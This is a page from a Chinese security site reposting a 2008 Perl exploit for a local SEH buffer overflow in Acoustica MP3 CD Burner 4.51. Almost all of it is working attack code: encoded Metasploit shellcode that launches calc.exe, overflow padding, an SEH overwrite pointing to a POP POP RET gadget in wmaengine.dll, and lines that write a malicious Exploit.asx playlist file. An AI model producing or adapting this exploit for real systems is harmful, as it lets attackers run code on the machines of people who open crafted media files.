首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Acoustica MP3 CD Burner 4.51 Build 147 (asx file) Local BOF Exploit 来源：www.vfcocus.net 作者：Koshi 发布时间：2008-09-01   #!/usr/bin/perl # # Acoustica MP3 CD Burner (asx file) Local BOF Exploit # Author: Koshi # # Date: 08-29-08 ( 0day ) # Application: Acoustica MP3 CD Burner # Version: 4.51 Build 147 ( possibly older ) # Site: http://acoustica.com/download.htm # Tested On: Windows XP SP3 Fully Patched # # Based off of n00b's findings http://www.milw0rm.com/exploits/4017 # gr33tz: Rima my baby, str0ke, n00b ( nice find ) # win32_exec -  EXITFUNC=process CMD=calc.exe Size=338 Encoder=Alpha2 http://metasploit.com my $shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49". "\x49\x49\x49\x49\x48\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x66". "\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x76\x42\x32\x42\x41\x32". "\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x49\x79\x4b\x4c\x4d". "\x38\x43\x74\x67\x70\x63\x30\x67\x70\x4c\x4b\x41\x55\x37\x4c\x6c". "\x4b\x41\x6c\x73\x35\x53\x48\x64\x41\x4a\x4f\x6c\x4b\x70\x4f\x67". "\x68\x6c\x4b\x41\x4f\x57\x50\x45\x51\x5a\x4b\x53\x79\x4e\x6b\x74". "\x74\x6c\x4b\x76\x61\x38\x6e\x64\x71\x59\x50\x6e\x79\x4e\x4c\x6b". "\x34\x79\x50\x63\x44\x73\x37\x4a\x61\x69\x5a\x44\x4d\x76\x61\x6b". "\x72\x7a\x4b\x4b\x44\x35\x6b\x50\x54\x77\x54\x65\x54\x71\x65\x4d". "\x35\x6e\x6b\x61\x4f\x64\x64\x65\x51\x7a\x4b\x63\x56\x4c\x4b\x56". "\x6c\x50\x4b\x4e\x6b\x43\x6f\x47\x6c\x65\x51\x6a\x4b\x6c\x4b\x55". "\x4c\x6c\x4b\x64\x41\x68\x6b\x6d\x59\x63\x6c\x45\x74\x75\x54\x59". "\x53\x36\x51\x4b\x70\x71\x74\x6e\x6b\x67\x30\x30\x30\x6f\x75\x6b". "\x70\x30\x78\x64\x4c\x4c\x4b\x37\x30\x44\x4c\x6e\x6b\x54\x30\x47". "\x6c\x6e\x4d\x6e\x6b\x53\x58\x75\x58\x6a\x4b\x76\x69\x4e\x6b\x6b". "\x30\x6c\x70\x37\x70\x47\x70\x35\x50\x4c\x4b\x50\x68\x57\x4c\x51". "\x4f\x35\x61\x6c\x36\x63\x50\x52\x76\x4f\x79\x6c\x38\x6b\x33\x6f". "\x30\x31\x6b\x36\x30\x33\x58\x73\x4e\x69\x48\x6b\x52\x44\x33\x55". "\x38\x6d\x48\x4b\x4e\x4d\x5a\x74\x4e\x50\x57\x4b\x4f\x48\x67\x71". "\x73\x62\x41\x32\x4c\x45\x33\x56\x4e\x55\x35\x61\x68\x31\x75\x75". "\x50\x66"; my $bof = "A"x480; my $led = "\x90"x35; my $fill = "\x90"x150; my $buff = "".    "$bof".    "\xeb\x06\x90\x90". ### Pointer to next SEH record    ###    "\x65\x82\x19\x01". ### SE handler wmaengine.dll POP POP RET 0x01198265 ###    "$led".    "$shellcode".    "$fill"; my $tuff = "".    "<ASX VERSION\=\x22\x33\x2e\x30\x22\x3e\n".    "<ENTRY>\n".    "<TITLE>Acoustica MP3 CD Burner Local BOF Exploit</TITLE>\n".    "<REF HREF=\x22$buff.asf\x22\x2f\x3e\n".    "</ENTRY>\n</ASX>\n"; open (MYFILE, '>>Exploit.asx'); binmode(MYFILE); print MYFILE "$tuff"; close (MYFILE); print "Exploit file has been created. ( Exploit.asx )\n";   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Invision Power Board <= 2.3.5 ·Friendly Technologies (fwRemot ·Acoustica Beatcraft 1.02 Build ·Friendly Technologies (fwRemot ·Friendly Technologies Read/Wri ·Acoustica Mixcraft <= 4.2 Buil ·Postfix <= 2.6-20080814 (symli ·Sun Solaris 8/9/10 and OpenSol ·Ultra Office ActiveX Control R ·Ultra Office ActiveX Control R ·WeBid 0.5.4 (fckeditor) Remote ·Microsoft Visual Studio (Msmas   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved